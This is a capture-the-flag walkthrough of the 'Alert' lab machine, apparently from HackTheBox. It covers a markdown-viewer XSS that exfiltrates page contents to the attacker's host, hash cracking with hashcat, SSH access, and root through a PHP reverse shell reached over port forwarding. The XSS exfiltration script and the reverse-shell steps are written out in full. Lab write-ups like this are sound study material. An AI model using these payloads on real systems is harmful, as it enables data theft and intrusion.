Alert is a easy linux machine created by . The md file is vulnerable to XSS and through contact form the Arbitrary File Read is performed. The hash of albert is found in one of the file. SSH into alber and pillaging reveals that the php server running at port 8080. The reverse shell php script is created and port 8080 is forwarded. The root shell is gained using nc and visiting the malicious php script.
OS
Difficulty
Points
Release Date
Retired Date
Linux
Easy
20
23-11-2024
22-03-2025
Enumeration
Nmap
Starting the nmap scan and found ssh and http services running.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.44
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 10:49 GMT
Nmap scan report for 10.10.11.44
Host is up (0.97s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.56 seconds
Add alert.htb in /etc/hosts file.
Web - alert.htb
Alert website is a markdown viewer, where we have to uplaod the markdown file and we see the markdown.
The Contact Us page has a form to write message and send it. The About Us has a message saying that the administrator reviews the contact messages.
Directory fuzzing reveals some of the hidden paths.
feroxbuster -u http://alert.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://alert.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 182l 385w 3622c http://alert.htb/css/style.css
302 GET 23l 48w 660c http://alert.htb/index.php => index.php?page=alert
302 GET 23l 48w 660c http://alert.htb/ => index.php?page=alert
200 GET 1l 3w 24c http://alert.htb/contact.php
301 GET 9l 28w 304c http://alert.htb/css => http://alert.htb/css/
301 GET 9l 28w 309c http://alert.htb/messages => http://alert.htb/messages/
200 GET 1l 0w 1c http://alert.htb/messages.php
301 GET 9l 28w 308c http://alert.htb/uploads => http://alert.htb/uploads/
200 GET 182l 385w 3622c http://alert.htb/css/style
[####################] - 4m 18989/18989 0s found:9 errors:106
[####################] - 2m 4745/4745 36/s http://alert.htb/
[####################] - 2m 4745/4745 39/s http://alert.htb/css/
[####################] - 2m 4745/4745 38/s http://alert.htb/messages/
[####################] - 2m 4745/4745 40/s http://alert.htb/uploads/
The messages gives the forbidden and messages.php has a blank page.
Foothold
Shell - albert [ Arbitrary File Read via XSS ]
Clicking Share Markdown button at the bottom right corner of the page gives us the http://alert.htb/visualizer.php?link_share=67e02ea9ea5471.39498561.md link to share the md file.
Exploit
Creating the malicious md file to read the files, and sharing the md file. The link is send via message in contact us to administrator and we will get to read the file.
1
Creating malicious md file
Adding the below script in payload.md file for checking Arbitrary File Read.
payload.md
<script>
var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.16.55:8000/?content=' + btoa(req.responseText), true);
req2.send();
</script>
2
Uploading and sharing the md file
Open the python server. Upload and share the md file. Paste the link in the contact us message input.
hashcat -a 0 hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 2 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
Time.Started.....: Mon Mar 24 06:42:43 2025 (0 secs)
Time.Estimated...: Mon Mar 24 06:42:43 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 16668 H/s (13.23ms) @ Accel:32 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344385 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2560/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: gators -> medicina
Hardware.Mon.#1..: Temp: 69c Util: 17%
Started: Mon Mar 24 06:42:23 2025
Stopped: Mon Mar 24 06:42:45 2025
The password gives us the ssh login as albert.
ssh albert@10.10.11.44
albert@10.10.11.44's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon 24 Mar 2025 10:45:08 AM UTC
System load: 0.07
Usage of /: 65.4% of 5.03GB
Memory usage: 13%
Swap usage: 0%
Processes: 236
Users logged in: 1
IPv4 address for eth0: 10.10.11.44
IPv6 address for eth0: dead:beef::250:56ff:fe94:caaa
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Mar 24 10:37:23 2025 from 10.10.16.124
albert@alert:~$
Privilege Escalation
Pillaging - albert [ user ]
The netstat reveals that the tcp port 8080 is open.
albert@alert:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
albert@alert:~$
The ps aux command reveals that the root is running php web-server in port 8080 and serving the files from /opt/website-monitor directory.
Creating the reverse shell php file in /opt/website-monitor directory gives us the reverse shell.
1
Port Forwarding [ port 8080 ]
ssh -L 8080:127.0.0.1:8080 albert@10.10.11.44
albert@10.10.11.44's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon 24 Mar 2025 12:43:41 PM UTC
System load: 0.0
Usage of /: 65.8% of 5.03GB
Memory usage: 13%
Swap usage: 0%
Processes: 237
Users logged in: 1
IPv4 address for eth0: 10.10.11.44
IPv6 address for eth0: dead:beef::250:56ff:fe94:caaa
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Mar 24 12:19:19 2025 from 10.10.16.55
albert@alert:~$
Open nc listener and visit http://localhost:8080/config/shell.php
curl http://localhost:8080/config/shell.php
nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.44 56194
bash: cannot set terminal process group (1012): Inappropriate ioctl for device
bash: no job control in this shell
root@alert:/opt/website-monitor/config#
Proof of Concept
The below video provides the PoC of Alert machine.
Searching the web for md files vulnerabilities, one of the hacktricks contains the XSS vulnerability which is used in md files. Trying the first XSS payload form hacktricks gives us the alert, which confirms the XSS vulnerability in md files.
